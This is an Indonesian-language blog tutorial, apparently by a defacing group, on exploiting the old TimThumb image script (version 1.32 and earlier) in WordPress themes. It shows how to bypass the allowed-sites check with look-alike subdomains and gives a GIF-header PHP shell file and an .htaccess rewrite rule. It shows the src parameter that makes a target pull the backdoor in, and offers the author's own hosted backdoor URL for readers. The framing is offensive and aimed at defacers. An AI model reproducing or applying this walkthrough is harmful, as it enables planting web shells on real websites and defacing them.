Hallo all, kali ini saya akan membahas tentang exploit yang sudah terbilang lama, tetapi masih sering dipakai oleh defacer-defacer sekarang ini. Exploit yang akan kita bahas yaitu tentang Exploit Timthumb.
Banyak yang bilang exploit Timthumb ini menggunkan teknik Remote Code Execution, tapi menurut yang saya setelah membaca dari beberapa sumber terpercaya, Teknik exploit Timthumb ini lebih mirip disebut Remote File Inclusion karena kita menggunakan Payload Backdoor dari Instance lain.
Sebelum kita melakukan Exploit, lebih baik kita bahas dulu cara membuat Payload Backdoor Timthumb tersebut untuk melakukan Exploitasi.
Cara Membuat Payload Backdoor Untuk Timthumb
1. Create Subdomain dan Hosting yang termasuk Allowed
$allowedSites = array (Di atas adalah potongan source code yang saya ambil dari timthumb.php versi 1.32.
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
);
if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower ($src), 'https://') !== false)Dari sini kita simpulkan bahwa timthumb bisa kita eksploitasi dengan menggunakan list array pada $allowedSites di atas.
if (strpos (strtolower ($url_info['host']), $site) !== false)
Contoh:
- flickr.com.cpanelmu.com
- picasa.com.webkamu.com
- Dan lain-lain yang terdapat pada $allowedSites
2. Membuat shell ekstensi .txt dan tambahkan header "gif".
GIF89a;Header gif ini berfungsi supaya executor dalam timthumb tersebut membaca bahwa Payload Backdoor yang kamu buat adalah sebuah gambar gif.
Langsung ke intinya saja ya, kalian buat file backdoor tapi ekstensi .txt kemudian pada line paling atas tambahkan header gif tersebut.
Filename: shell.txt
GIF89a;
<?php
# shellnya
?>
3. Buat .htaccess Rewrite
Buat file .htaccessRewriteEngine onFungsinya adalah memanggil configurasi webserver supaya dapat me Rewrite/Rename file .txt tersebut menjadi format .php.
RewriteRule ^shell\.php$ /shell.txt [L]
Sekiranya dalam Root Directory Web untuk Payload Backdoor kalian:
Jika sudah berhasil kalian dapat membukanya
Contoh: http://flickr.com.webkalian.com/shell.php
Output hanya source code mentah dari php.
Atau seperti gambar di bawah ini:
Jika sudah tandanya kalian berhasil membuat Payload Backdoor tersebut.
Note: Jika kalian tidak punya domain dan hosting yang dapat create subdomain, untuk sementara kalian bisa pakai saya http://flickr.com.ehpet.net/uploader.php
Timthumb Exploitation
Target tersebut menggunkan CMS Wordpress dengan Themes newspro dan memiliki timthumb versi 1.25 (karena yang dapat dieksploitasi itu hanya timthumb <= 1.32/1.32 ke bawah).
Lalu saya coba eksploitasi dengan menggunakan Payload Backdoor yang saya miliki yaitu http://flickr.com.ehpet.net/uploader.php.
Kemudian cara eksploiatsi dengan cara menambahkan ?src=URL_Backdoor pada timthumb.php seperti di bawah ini:
Tara! Jika output mengeluarkan file (yang saya drag warna hijau) seperti di atas, artinya target tersebut berhasil dieksploitasi!
Sekian dari saya,
Jika ada sesuatu hal yang kurang jelas, bisa kita diskusikan di fanspage ZeroByte.ID tercinta pada link berikut:
https://www.facebook.com/idzerobyte
Terima kasih.